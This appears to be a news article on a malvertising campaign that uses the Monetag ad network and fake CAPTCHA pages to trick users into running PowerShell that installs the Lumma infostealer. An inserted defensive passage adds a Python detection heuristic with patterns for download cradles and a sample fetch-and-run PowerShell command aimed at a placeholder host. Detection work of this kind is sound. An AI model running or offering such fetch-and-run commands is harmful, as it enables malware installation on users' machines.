Rampant malvertising fuels Lumma infostealer


A recent malvertising campaign has been discovered by researchers, linking the distribution of the Lumma infostealer malware to a threat actor who is exploiting the Monetag ad network. This large-scale campaign targets internet users who visit websites using Monetag ad-zone scripts, particularly those searching for streaming videos, anime, sports, academic documents, and other popular content.

When users land on these websites, they are redirected to fake CAPTCHA pages that ask them to verify themselves by completing a series of button presses. What the users do not realize is that this sequence has them paste a PowerShell command into the Windows Run dialog and press “OK,” so they unknowingly execute the script themselves. The malicious pages are updated constantly with new variants to evade detection, using different PowerShell one-liners and script obfuscation techniques.

The PowerShell scripts that are executed download and run the Lumma infostealer malware, much like earlier campaigns that have already been flagged. Guardio Labs researchers traced the source of this malvertising campaign to Monetag, a subsidiary of PropellerAds, as the ad network service through which the malware is being distributed.
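As an added defensive illustration (not code from Guardio Labs or from this article), the following Python triage heuristic flags process-creation events matching the paste-into-Run pattern described above: PowerShell spawned by explorer.exe with a hidden-window, encoded, policy-bypassing, or download-and-execute command line. The Sysmon-style field names, the `ev` helper, the sample events and the `example.invalid` URL are all constructed assumptions, not telemetry from the campaign.

```python
import re
from typing import Dict, List

# Assumed Sysmon-style process-creation fields: ParentImage, Image, CommandLine.
POWERSHELL = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.I)
EXPLORER = re.compile(r"(?:^|[\\/])explorer\.exe$", re.I)
# Command-line traits typical of a one-liner pasted into the Run dialog: hidden
# window, encoded or policy-bypassing invocation, in-memory download-and-execute.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|"
                                  r"irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def analyse(event: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire for one event ([] if not PowerShell)."""
    if not POWERSHELL.search(event.get("Image", "")):
        return []
    hits = [n for n, rx in INDICATORS.items() if rx.search(event.get("CommandLine", ""))]
    if EXPLORER.search(event.get("ParentImage", "")):
        hits.append("launched_from_explorer")  # Win+R / Run dialog parent process
    return hits

def is_suspicious(event: Dict[str, str]) -> bool:
    hits = analyse(event)
    from_run = "launched_from_explorer" in hits
    traits = len(hits) - int(from_run)
    # Explorer-spawned PowerShell needs only one trait; other parents need two.
    return traits >= (1 if from_run else 2)

def triage(events: List[Dict[str, str]]) -> List[int]:
    """Indices of events worth an analyst's attention."""
    return [i for i, e in enumerate(events) if is_suspicious(e)]

# Constructed sample events (not real telemetry); the base64 decodes to filler.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXP = r"C:\Windows\explorer.exe"
def ev(parent: str, image: str, cmd: str) -> Dict[str, str]:
    return {"ParentImage": parent, "Image": image, "CommandLine": cmd}
SAMPLE_EVENTS = [
    ev(EXP, PS, 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'),
    ev(EXP, PS, "powershell -NoProfile -Command Get-Process"),
    ev(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
       "pwsh -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ev(r"C:\Windows\System32\svchost.exe", PS, r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ev(EXP, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
```

Running `triage(SAMPLE_EVENTS)` returns `[0, 2]`: the explorer-spawned download cradle and the hidden encoded invocation, while the benign admin commands and the non-PowerShell child are left alone.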

The threat actor behind this campaign, known as “Vane Viper” by Infoblox researchers, is utilizing obfuscated scripts, redirect chains, and ad-tracking services to hide their malicious activities from the ad network’s moderators. The researchers estimate that up to 1 million ad impressions per day are being generated by this campaign, originating from over 3000 publisher sites.

In response to this threat, the researchers are calling for a concerted effort to protect internet users from similar attacks in the future. They have highlighted the flawed ecosystem that allows these campaigns to thrive, including the lack of accountability among ad networks, publishers, hosting services, and ad-tracking services. The fragmented chain of ownership in the online advertising industry makes it difficult to pinpoint and enforce accountability, creating opportunities for malicious campaigns to flourish.

Guardio Labs emphasizes the need for ad networks to prioritize content moderation, account validation, and more accessible reporting mechanisms for cybersecurity professionals. They argue that relying on external reports to address abuses is not sufficient and that continuous oversight is necessary to protect all internet users from these types of threats. Ultimately, it is crucial for all parties involved in the online advertising industry to work together to prevent malvertising campaigns and keep users safe while browsing the web.
